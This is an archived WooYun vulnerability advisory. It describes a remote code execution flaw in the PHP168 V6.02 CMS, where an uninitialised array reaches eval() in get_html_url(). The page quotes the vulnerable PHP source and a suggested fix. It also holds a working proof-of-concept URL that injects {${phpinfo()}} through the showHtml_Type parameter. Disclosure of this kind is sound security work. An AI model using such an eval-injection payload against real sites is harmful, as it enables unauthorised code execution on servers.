当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(8) 关注此漏洞

缺陷编号: WooYun-2010-00528

漏洞标题: PHP168 V6.02整站系统远程执行任意代码漏洞

相关厂商: PHP168

漏洞作者: 路人甲

提交时间: 2010-09-10 22:01

公开时间: 2010-09-11 13:27

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码审核 php168 php代码执行 eval

6人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-09-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-09-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

PHP168在某些函数里运用了eval函数,但是某数组没有初试化,导致可以提交任意代码执行.

详细说明:

漏洞出在inc/function.inc.php里面.get_html_url()这个函数.



code 区域
function get_html_url(){
global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type;
$id=$aid;
if($page<1){
$page=1;
}
$postdb[posttime]=$rsdb[posttime];

if($showHtml_Type[bencandy][$id]){
$filename_b=$showHtml_Type[bencandy][$id];
}elseif($fidDB[bencandy_html]){
$filename_b=$fidDB[bencandy_html];
}else{
$filename_b=$webdb[bencandy_filename];
}
//对于内容页的首页把$page去除
if($page==1){
$filename_b=preg_replace("/(.*)(-{\\\$page}|_{\\\$page})(.*)/is","\\1\\3",$filename_b);
}
$dirid=floor($aid/1000);
//对于内容页的栏目小于1000篇文章时,把DIR分目录去除
if($dirid==0){
$filename_b=preg_replace("/(.*)(-{\\\$dirid}|_{\\\$dirid})(.*)/is","\\1\\3",$filename_b);
}
if(strstr($filename_b,'$time_')){
$time_Y=date("Y",$postdb[posttime]);
$time_y=date("y",$postdb[posttime]);
$time_m=date("m",$postdb[posttime]);
$time_d=date("d",$postdb[posttime]);
$time_W=date("W",$postdb[posttime]);
$time_H=date("H",$postdb[posttime]);
$time_i=date("i",$postdb[posttime]);
$time_s=date("s",$postdb[posttime]);
}
if($fidDB[list_html]){
$filename_l=$fidDB[list_html];
}else{
$filename_l=$webdb[list_filename];
}
if($page==1){
if($webdb[DefaultIndexHtml]==1){
$filename_l=preg_replace("/(.*)\/([^\/]+)/is","\\1/index.html",$filename_l);
}else{
$filename_l=preg_replace("/(.*)\/([^\/]+)/is","\\1/index.htm",$filename_l);
}
}
eval("\$array[_showurl]=\"$filename_b\";");
eval("\$array[_listurl]=\"$filename_l\";");
//自定义了栏目域名
if($Html_Type[domain][$fid]&&$Html_Type[domain_dir][$fid]){
$rule=str_replace("/","\/",$Html_Type[domain_dir][$fid]);
$filename_b=preg_replace("/^$rule/is","{$Html_Type[domain][$fid]}/",$filename_b);
$filename_l=preg_replace("/^$rule/is","{$Html_Type[domain][$fid]}/",$filename_l);
//特别处理一下些自定义内容页文件名的情况.
if(!eregi("^http:\/\/",$filename_b)){
$filename_b="$webdb[www_url]/$filename_b";
}
}else{
$filename_b="$webdb[www_url]/$filename_b";
$filename_l="$webdb[www_url]/$filename_l";
}
eval("\$array[showurl]=\"$filename_b\";");
eval("\$array[listurl]=\"$filename_l\";");
return $array;
}







当$showHtml_Type这个数组存在时,赋值$filename_b为$showHtml_Type[bencandy][$id].跟一下这个get_html_url()函数.



在member/post.php中:



code 区域
if(!$aid&&!$rid){
$aid=$id;
}
if($rid)
{
if(!$aid){
showerr("aid不存在!");
}
$erp=get_id_table($aid);
//修改主题或修改多页都可
$rsdb=$db->get_one("SELECT R.*,A.* FROM {$pre}article$erp A LEFT JOIN {$pre}reply$erp R ON A.aid=R.aid WHERE R.rid='$rid'");
$aid=$rsdb[aid];
$fid=$rsdb[fid];
$mid=$rsdb[mid];
}
elseif($aid)
{
$erp=get_id_table($aid);
//只能是修改主题/续发文章
$rsdb=$db->get_one("SELECT R.*,A.* FROM {$pre}article$erp A LEFT JOIN {$pre}reply$erp R ON A.aid=R.aid WHERE A.aid='$aid' ORDER BY R.rid ASC LIMIT 1");
isset($fid) || $fid=$rsdb[fid];
$mid=$rsdb[mid];
}
//让用户选择栏目
if((!$fid&&!$only)||$jobs=="choose")
{
$sortdb=array();
if( $webdb[sortNUM]>500||$fid ){
$rows=100;
$page<1 && $page=1;
$min=($page-1)*$rows;
$showpage=getpage("{$pre}sort","WHERE fup='$fid'","?lfj=$lfj&job=$job&jobs=$jobs&only=$only&mid=$mid&fid=$fid",$rows);
$query = $db->query("SELECT * FROM {$pre}sort WHERE fup='$fid' ORDER BY list DESC,fid ASC LIMIT $min,$rows");
while($rs = $db->fetch_array($query)){
$rs[post]=$rs[NUM]=$rs[do_art]='';
$detail_admin=@explode(",",$rs[admin]);
$detail_allowpost=@explode(",",$rs[allowpost]);
if(!$rs[type]&&( $web_admin||($lfjid&&@in_array($lfjid,$detail_admin))||@in_array($groupdb['gid'],$detail_allowpost) ))
{
$erp=$Fid_db[iftable][$rs[fid]];
$_rs=$db->get_one("SELECT COUNT(*) AS NUM FROM {$pre}article$erp WHERE fid='$rs[fid]' AND uid='$lfjuid'");
if($_rs[NUM]&&$lfjid){
$rs[NUM]="( <b>{$_rs[NUM]}</b> )";
$rs[do_art]="<A HREF='myarticle.php?job=myarticle&fid=$rs[fid]' class='manage_article'>管理</A>";
}
$rs[post]="<A HREF='?job=postnew&fid=$rs[fid]' class='post_article'>发表</A>";
$allowpost++;
}
$sortdb[]=$rs;
}
if($fid){
$show_guide="<A HREF='?lfj=$lfj&jobs=$jobs&job=$job&only=$only&mid=$mid'>返回顶级目录</A> ".list_sort_guide($fid);
}
}else{
list_post_allsort();
if(!$allowpost){
showerr("你所在用户组无权发表文章",1);
}
}
$MSG="请选择一个栏目投稿";
require(dirname(__FILE__)."/"."head.php");
require(dirname(__FILE__)."/"."template/post_set.htm");
require(dirname(__FILE__)."/"."foot.php");
exit;
}
if($fid||$step){
$fidDB=$db->get_one("SELECT * FROM {$pre}sort WHERE fid='$fid'");
!$fidDB && showerr("栏目有误");
$fidDB[type]!=0 && showerr("你只能选择子栏目发表内容!");
}
$job=='postnew' && !$mid && $mid=$fidDB[fmid];
if($lfjid&&@in_array($lfjid,explode(',',$fidDB[admin])))
{
$web_admin=1;
}
if($fidDB&&!$web_admin&&!in_array($groupdb[gid],explode(',',$fidDB[allowpost])))
{
showerr("你所在用户组无权在本栏目“{$fidDB[name]}”有任何操作");
}
if(!$lfjid&&$job!='postnew')
{
showerr("游客无权操作");
}
$atc_power=0;
if($lfjid)
{
if($web_admin||$lfjuid==$rsdb[uid]){
$atc_power=1;
}
}
$uid=isset($rsdb[uid])?$rsdb[uid]:$lfjuid;
if($job=='endHTML')
{
$htmlurldb=get_html_url();
//首页生成静态
@unlink(PHP168_PATH."index.htm.bak");
rename(PHP168_PATH."index.htm",PHP168_PATH."index.htm.bak");
refreshto("myarticle.php?job=myarticle&mid=$mid&only=$only","<CENTER>[<A HREF='?job=postnew&fid=$fid&mid=$mid&only=$only'>发表新主题</A>] [<A HREF='?job=post_more&aid=$aid&mid=$mid&only=$only'>续发本主题</A>] [<A HREF='myarticle.php?job=myarticle&fid=$fid&mid=$mid&only=$only'>返回文章列表</A>] [<A HREF='{$htmlurldb[showurl]}' target=_blank>查看文章</A>] [<A HREF='?job=manage&aid=$aid&mid=$mid&only=$only'>修改文章</A>]</CENTER>",60);
}





当only或者fid不等于0时,且job等于"endHTML"时,执行函数.由于$showHtml_Type数组和$aid是可以由我们赋值的,所以漏洞产生.

漏洞证明:

先注册一个会员,登陆后在地址栏提交:



http://**.**.**.**/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML



可以看到执行了phpinfo().

修复方案:

初始化$showHtml_Type数组.

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2014-02-25 19:21 | 浅蓝 ( 普通白帽子 | Rank:283 漏洞数:111 | 圈内最帅,没有之一)
    1

    神奇的路人甲

  2. 2016-03-16 20:19 | jinyu00 ( 实习白帽子 | Rank:81 漏洞数:24 | 我还是太年轻..........)
    1

    不错

登录后才能发表评论,请先 登录